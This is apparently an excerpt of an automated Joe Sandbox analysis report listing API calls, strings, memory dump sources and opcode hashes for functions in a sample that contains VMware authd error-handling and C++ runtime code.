                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: Password required for %s.$USER too long.
                                                    • API String ID: 2415109466-1624167280
                                                    • Opcode ID: 6c7ad5b0f1a0ed45e6591a1bb9cf87a953f30fbfad15d0f475c794d93e4b6d25
                                                    • Instruction ID: 6d79aa112e50fd2d4fbfbb57bad3bd85ff4dba87920a3b026ee6d9941aaf75f9
                                                    • Opcode Fuzzy Hash: 6c7ad5b0f1a0ed45e6591a1bb9cf87a953f30fbfad15d0f475c794d93e4b6d25
                                                    • Instruction Fuzzy Hash: C7F0A73378030432E7206969AC03FD63358D781B25F04153BF7287A3C2D2D1765242A7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,00001000,?,00ED6E9C,?,00ED6E9C,RevertToSelf failed: %d,00000000), ref: 00ED273F
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                      • Part of subcall function 00ED39A0: Warning.VMWAREBASE(?,00000406,?,?,?), ref: 00ED39D9
                                                      • Part of subcall function 00ED39A0: Warning.VMWAREBASE(00000000,?,?,?,?,?,?), ref: 00ED3A21
                                                      • Part of subcall function 00ED39A0: WSAGetLastError.WS2_32(?,?,?,?,?,?), ref: 00ED3A2B
                                                      • Part of subcall function 00ED39A0: WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?), ref: 00ED3A49
                                                      • Part of subcall function 00ED39A0: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED3AD1
                                                      • Part of subcall function 00ED39A0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED3AEE
                                                      • Part of subcall function 00ED3DD0: ExitThread.KERNEL32 ref: 00ED3DF3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$CloseExitHandleObjectSingleThreadWait_printf
                                                    • String ID: 599 vmware-authd PANIC: %s$PANIC: %s
                                                    • API String ID: 333243209-1572072357
                                                    • Opcode ID: f416d13f9520b6f89e86e4bb48deceef7ec48edc5ee071afadaea82ef59354ba
                                                    • Instruction ID: 6040b2efb1c74c55a95507c29761dc74080cb634497623de2386aafdbf6ca2ea
                                                    • Opcode Fuzzy Hash: f416d13f9520b6f89e86e4bb48deceef7ec48edc5ee071afadaea82ef59354ba
                                                    • Instruction Fuzzy Hash: F6F09674600248AED711EB90CC46FE873ECEB08795F44109ABA48AB346DAB16AC58B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 6CF514F5
                                                      • Part of subcall function 6CF766AC: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CF766B8
                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6CF5151E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
                                                    • String ID: string too long
                                                    • API String ID: 1846318660-2556327735
                                                    • Opcode ID: 7aac222ac65d09daf5e4b5027e8375a6749e7d86315ab4771ab691042467fbfa
                                                    • Instruction ID: ebb62d91c2cc3168c6e93c67c8cfd075a532c06f126cef18f55fa0f2b5089274
                                                    • Opcode Fuzzy Hash: 7aac222ac65d09daf5e4b5027e8375a6749e7d86315ab4771ab691042467fbfa
                                                    • Instruction Fuzzy Hash: 74E0C2B3910308A7CA109FA8EC029C6B7ACDF1A6587108527F648EBF00E771A88087B4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,?), ref: 00ED7910
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00ED7977
                                                    • CloseHandle.KERNEL32(?), ref: 00ED797E
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?), ref: 00ED7990
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$CloseEnterHandleLeavefree
                                                    • String ID:
                                                    • API String ID: 321630039-0
                                                    • Opcode ID: 6e00989e63f7c6ab1ffc76082bfcafab42d2a7da2080464a1b1ccc4691f12f24
                                                    • Instruction ID: 05bbb65ebaf551e4bdcbea15631e0c7c302fd49c05a338a499f5db05f771b296
                                                    • Opcode Fuzzy Hash: 6e00989e63f7c6ab1ffc76082bfcafab42d2a7da2080464a1b1ccc4691f12f24
                                                    • Instruction Fuzzy Hash: 18118135501148DFC700CF59E994AAC77B9EF8E305F5000AAE905EB331D331AB89CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00ED3240: Warning.VMWAREBASE(0000002C,?,NOT_IMPLEMENTED %s:%d,bora\apps\vmauthd\authdWin32.c,000001DA,?,00ED15CF), ref: 00ED325D
                                                      • Part of subcall function 00ED3240: CloseHandle.KERNEL32(00000008,?,NOT_IMPLEMENTED %s:%d,bora\apps\vmauthd\authdWin32.c,000001DA,?,00ED15CF), ref: 00ED3273
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1F33
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1F51
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00ED1F76
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1F7F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: free$CloseHandleWarning
                                                    • String ID:
                                                    • API String ID: 3628937476-0
                                                    • Opcode ID: 4d5256a9344ab4e957c9dcfe0a749f48ad7c040682dea8478dbd4ad7c1ef05ce
                                                    • Instruction ID: db3687eb212f686f28852465f0c90810431380d71fdb970d745bdc6108e7e12b
                                                    • Opcode Fuzzy Hash: 4d5256a9344ab4e957c9dcfe0a749f48ad7c040682dea8478dbd4ad7c1ef05ce
                                                    • Instruction Fuzzy Hash: 5601A7B0501700DFDB20AF61E804B4AB7E4FF04314F04842AF95A67321CB3AA654CF41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%